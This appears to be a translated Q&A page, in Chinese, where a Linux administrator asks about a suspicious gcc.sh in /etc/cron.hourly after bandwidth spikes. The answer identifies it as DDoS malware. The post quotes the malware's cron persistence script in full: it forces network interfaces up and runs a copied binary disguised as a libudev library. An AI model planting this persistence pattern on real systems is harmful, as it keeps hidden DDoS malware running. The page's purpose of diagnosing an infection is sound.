linux – 这个文件(gcc.sh)是否在cron.hourly恶意软件中?

我的服务器上遇到了高达1 Gbps的峰值,并且一直在寻找病毒和恶意软件.我在/etc/cron.hourly中找到了这个文件:gcc.sh,并且想知道是否有人看过类似的东西,并且会对代码有所了解.谢谢!

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

解决方法:

很有可能.它使用/lib/libudev.so.6作为可执行文件,而名称暗示它应该是一个库 – 尝试使用像nm或objdump这样的工具来查看它是否是可执行文件.它从/lib/libudev.so复制到.so.6 – 而.so通常是版本化符号的符号链接.它还运行for循环以显示所有网络连接,即使您已将其关闭.它使用着名的编译器的名称来看起来合法.我称之为99%可能是病毒.

找到另一个自称为gcc – https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver的引用.是的,这是unix系统上的DDoS病毒,与您的问题完全匹配.

上一篇:Java问题 – 几乎看起来像病毒?


下一篇:我被黑了,现在我有一个奇怪的PHP文件.它在做什么?